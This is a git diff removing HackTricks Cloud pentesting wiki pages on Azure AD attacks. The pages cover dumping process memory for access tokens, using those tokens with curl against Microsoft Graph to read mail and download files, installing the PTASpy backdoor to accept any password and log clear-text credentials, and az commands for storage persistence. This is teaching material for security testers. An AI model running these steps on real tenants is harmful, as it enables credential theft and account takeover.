- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md deleted file mode 100644 index 3512fd876..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md +++ /dev/null @@ -1,65 +0,0 @@ -# Az - Processes Memory Access Token - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## **Basic Information** - -As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA. - -Steps: - -1. Dump the excel processes synchronized with in EntraID user with your favourite tool. -2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output -3. Find the tokens that interest you the most and run tools over them: - -{% code overflow="wrap" %} -```bash -# Check the identity of the token -curl -s -H "Authorization: Bearer " https://graph.microsoft.com/v1.0/me | jq - -# Check the email (you need a token authorized in login.microsoftonline.com) -curl -s -H "Authorization: Bearer " https://outlook.office.com/api/v2.0/me/messages | jq - -# Download a file from Teams -## You need a token that can access graph.microsoft.com -## Then, find the inside the memory and call -curl -s -H "Authorization: Bearer " https://graph.microsoft.com/v1.0/sites//drives | jq - -## Then, list one drive -curl -s -H "Authorization: Bearer " 'https://graph.microsoft.com/v1.0/sites//drives/' | jq - -## Finally, download a file from that drive: -┌──(magichk㉿black-pearl)-[~] -└─$ curl -o -L -H "Authorization: Bearer " '<@microsoft.graph.downloadUrl>' -``` -{% endcode %} - -**Note that these kind of access tokens can be also found inside other processes.** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md deleted file mode 100644 index 109104b7e..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md +++ /dev/null @@ -1,86 +0,0 @@ -# Az AD Connect - Hybrid Identity - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Integration between **On-premises Active Directory (AD)** and **Azure AD** is facilitated by **Azure AD Connect**, offering various methods that support **Single Sign-on (SSO)**. Each method, while useful, presents potential security vulnerabilities that could be exploited to compromise cloud or on-premises environments: - -* **Pass-Through Authentication (PTA)**: - * Possible compromise of the agent on the on-prem AD, allowing validation of user passwords for Azure connections (on-prem to Cloud). - * Feasibility of registering a new agent to validate authentications in a new location (Cloud to on-prem). - -{% content-ref url="pta-pass-through-authentication.md" %} -[pta-pass-through-authentication.md](pta-pass-through-authentication.md) -{% endcontent-ref %} - -* **Password Hash Sync (PHS)**: - * Potential extraction of clear-text passwords of privileged users from the AD, including credentials of a high-privileged, auto-generated AzureAD user. - -{% content-ref url="phs-password-hash-sync.md" %} -[phs-password-hash-sync.md](phs-password-hash-sync.md) -{% endcontent-ref %} - -* **Federation**: - * Theft of the private key used for SAML signing, enabling impersonation of on-prem and cloud identities. - -{% content-ref url="federation.md" %} -[federation.md](federation.md) -{% endcontent-ref %} - -* **Seamless SSO:** - * Theft of the `AZUREADSSOACC` user's password, used for signing Kerberos silver tickets, allowing impersonation of any cloud user. - -{% content-ref url="seamless-sso.md" %} -[seamless-sso.md](seamless-sso.md) -{% endcontent-ref %} - -* **Cloud Kerberos Trust**: - * Possibility of escalating from Global Admin to on-prem Domain Admin by manipulating AzureAD user usernames and SIDs and requesting TGTs from AzureAD. 
- -{% content-ref url="az-cloud-kerberos-trust.md" %} -[az-cloud-kerberos-trust.md](az-cloud-kerberos-trust.md) -{% endcontent-ref %} - -* **Default Applications**: - * Compromising an Application Administrator account or the on-premise Sync Account allows modification of directory settings, group memberships, user accounts, SharePoint sites, and OneDrive files. - -{% content-ref url="az-default-applications.md" %} -[az-default-applications.md](az-default-applications.md) -{% endcontent-ref %} - -For each integration method, user synchronization is conducted, and an `MSOL_` account is created in the on-prem AD. Notably, both **PHS** and **PTA** methods facilitate **Seamless SSO**, enabling automatic sign-in for Azure AD computers joined to the on-prem domain. - -To verify the installation of **Azure AD Connect**, the following PowerShell command, utilizing the **AzureADConnectHealthSync** module (installed by default with Azure AD Connect), can be used: - -```powershell -Get-ADSyncConnector -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md deleted file mode 100644 index 357b0f863..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md +++ /dev/null @@ -1,35 +0,0 @@ -# Az - Default Applications - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -**Check the techinque in:** [**https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/**](https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/)**,** [**https://www.youtube.com/watch?v=JEIR5oGCwdg**](https://www.youtube.com/watch?v=JEIR5oGCwdg) and [**https://www.youtube.com/watch?v=xei8lAPitX8**](https://www.youtube.com/watch?v=xei8lAPitX8) - -The blog post discusses a privilege escalation vulnerability in Azure AD, allowing Application Admins or compromised On-Premise Sync Accounts to escalate privileges by assigning credentials to applications. The vulnerability, stemming from the "by-design" behavior of Azure AD's handling of applications and service principals, notably affects default Office 365 applications. Although reported, the issue is not considered a vulnerability by Microsoft due to documentation of the admin rights assignment behavior. The post provides detailed technical insights and advises regular reviews of service principal credentials in Azure AD environments. For more detailed information, you can visit the original blog post. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md deleted file mode 100644 index d2c2f4287..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md +++ /dev/null @@ -1,61 +0,0 @@ -# Az- Synchronising New Users - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Syncing AzureAD users to on-prem to escalate from on-prem to AzureAD - -I order to synchronize a new user f**rom AzureAD to the on-prem AD** these are the requirements: - -* The **AzureAD user** needs to have a proxy address (a **mailbox**) -* License is not required -* Should **not be already synced** - -{% code overflow="wrap" %} -```powershell -Get-MsolUser -SerachString admintest | select displayname, lastdirsynctime, proxyaddresses, lastpasswordchangetimestamp | fl -``` -{% endcode %} - -When a user like these is found in AzureAD, in order to **access it from the on-prem AD** you just need to **create a new account** with the **proxyAddress** the SMTP email. - -An automatically, this user will be **synced from AzureAD to the on-prem AD user**. - -{% hint style="danger" %} -Notice that to perform this attack you **don't need Domain Admin**, you just need permissions to **create new users**. - -Also, this **won't bypass MFA**. - -Moreover, this was reported an **account sync is no longer possible for admin accounts**. -{% endhint %} - -## References - -* [https://www.youtube.com/watch?v=JEIR5oGCwdg](https://www.youtube.com/watch?v=JEIR5oGCwdg) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md deleted file mode 100644 index d84673358..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md +++ /dev/null @@ -1,100 +0,0 @@ -# Az - PTA - Pass-through Authentication - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-pta) Azure Active Directory (Azure AD) Pass-through Authentication allows your users to **sign in to both on-premises and cloud-based applications using the same passwords**. This feature provides your users a better experience - one less password to remember, and reduces IT helpdesk costs because your users are less likely to forget how to sign in. When users sign in using Azure AD, this feature **validates users' passwords directly against your on-premises Active Directory**. - -In PTA **identities** are **synchronized** but **passwords** **aren't** like in PHS. - -The authentication is validated in the on-prem AD and the communication with cloud is done by an **authentication agent** running in an **on-prem server** (it does't need to be on the on-prem DC). - -### Authentication flow - -
- -1. To **login** the user is redirected to **Azure AD**, where he sends the **username** and **password** -2. The **credentials** are **encrypted** and set in a **queue** in Azure AD -3. The **on-prem authentication agent** gathers the **credentials** from the queue and **decrypts** them. This agent is called **"Pass-through authentication agent"** or **PTA agent.** -4. The **agent** **validates** the creds against the **on-prem AD** and sends the **response** **back** to Azure AD which, if the response is positive, **completes the login** of the user. - -{% hint style="warning" %} -If an attacker **compromises** the **PTA** he can **see** the all **credentials** from the queue (in **clear-text**).\ -He can also **validate any credentials** to the AzureAD (similar attack to Skeleton key). -{% endhint %} - -### On-Prem -> cloud - -If you have **admin** access to the **Azure AD Connect server** with the **PTA** **agent** running, you can use the **AADInternals** module to **insert a backdoor** that will **validate ALL the passwords** introduced (so all passwords will be valid for authentication): - -```powershell -Install-AADIntPTASpy -``` - -{% hint style="info" %} -If the **installation fails**, this is probably due to missing [Microsoft Visual C++ 2015 Redistributables](https://download.microsoft.com/download/6/A/A/6AA4EDFF-645B-48C5-81CC-ED5963AEAD48/vc_redist.x64.exe). -{% endhint %} - -It's also possible to **see the clear-text passwords sent to PTA agent** using the following cmdlet on the machine where the previous backdoor was installed: - -```powershell -Get-AADIntPTASpyLog -DecodePasswords -``` - -This backdoor will: - -* Create a hidden folder `C:\PTASpy` -* Copy a `PTASpy.dll` to `C:\PTASpy` -* Injects `PTASpy.dll` to `AzureADConnectAuthenticationAgentService` process - -{% hint style="info" %} -When the AzureADConnectAuthenticationAgent service is restarted, PTASpy is “unloaded” and must be re-installed. 
-{% endhint %} - -### Cloud -> On-Prem - -{% hint style="danger" %} -After getting **GA privileges** on the cloud, it's possible to **register a new PTA agent** by setting it on an **attacker controlled machine**. Once the agent is **setup**, we can **repeat** the **previous** steps to **authenticate using any password** and also, **get the passwords in clear-text.** -{% endhint %} - -### Seamless SSO - -It's possible to use Seamless SSO with PTA, which is vulnerable to other abuses. Check it in: - -{% content-ref url="seamless-sso.md" %} -[seamless-sso.md](seamless-sso.md) -{% endcontent-ref %} - -## References - -* [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta) -* [https://aadinternals.com/post/on-prem\_admin/#pass-through-authentication](https://aadinternals.com/post/on-prem_admin/#pass-through-authentication) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md b/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md deleted file mode 100644 index d8149527a..000000000 --- a/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md +++ /dev/null @@ -1,33 +0,0 @@ -# Az - Permissions for a Pentest - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md b/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md deleted file mode 100644 index e7c185893..000000000 --- a/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md +++ /dev/null @@ -1,59 +0,0 @@ -# Az - Queue Storage Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Queue - -For more information check: - -{% content-ref url="../az-services/az-queue-enum.md" %} -[az-queue-enum.md](../az-services/az-queue-enum.md) -{% endcontent-ref %} - -### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write` - -This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks. - -{% code overflow="wrap" %} -```bash -az storage queue create --name --account-name - -az storage queue metadata update --name --metadata key1=value1 key2=value2 --account-name - -az storage queue policy set --name --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name -``` -{% endcode %} - -## References - -* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues -* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api -* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md b/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md deleted file mode 100644 index 196d5ebf4..000000000 --- a/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md +++ /dev/null @@ -1,72 +0,0 @@ -# Az - Storage Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Storage Privesc - -For more information about storage check: - -{% content-ref url="../az-services/az-storage.md" %} -[az-storage.md](../az-services/az-storage.md) -{% endcontent-ref %} - -### Common tricks - -* Keep the access keys -* Generate SAS - * User delegated are 7 days max - -### Microsoft.Storage/storageAccounts/blobServices/containers/update && Microsoft.Storage/storageAccounts/blobServices/deletePolicy/write - -These permissions allows the user to modify blob service properties for the container delete retention feature, which enables or configures the retention period for deleted containers. These permissions can be used for maintaining persistence to provide a window of opportunity for the attacker to recover or manipulate deleted containers that should have been permanently removed and accessing sensitive information. - -{% code overflow="wrap" %} -```bash -az storage account blob-service-properties update \ - --account-name \ - --enable-container-delete-retention true \ - --container-delete-retention-days 100 -``` -{% endcode %} - -### Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action - -These permissions can lead to the attacker to modify the retention policies, restoring deleted data, and accessing sensitive information. - -{% code overflow="wrap" %} -```bash -az storage blob service-properties delete-policy update \ - --account-name \ - --enable true \ - --days-retained 100 -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - diff --git a/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md b/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md deleted file mode 100644 index 5f67c2b12..000000000 --- a/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md +++ /dev/null @@ -1,51 +0,0 @@ -# Az - VMs Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## VMs persistence - -For more information about VMs check: - -{% content-ref url="../az-services/vms/" %} -[vms](../az-services/vms/) -{% endcontent-ref %} - -### Backdoor VM applications, VM Extensions & Images - -An attacker identifies applications, extensions or images being frequently used in the Azure account, he could insert his code in VM applications and extensions so every time they get installed the backdoor is executed. - -### Backdoor Instances - -An attacker could get access to the instances and backdoor them: - -* Using a traditional **rootkit** for example -* Adding a new **public SSH key** (check [EC2 privesc options](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc)) -* Backdooring the **User Data** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md deleted file mode 100644 index d63a1375f..000000000 --- a/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md +++ /dev/null @@ -1,71 +0,0 @@ -# Az - Blob Storage Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
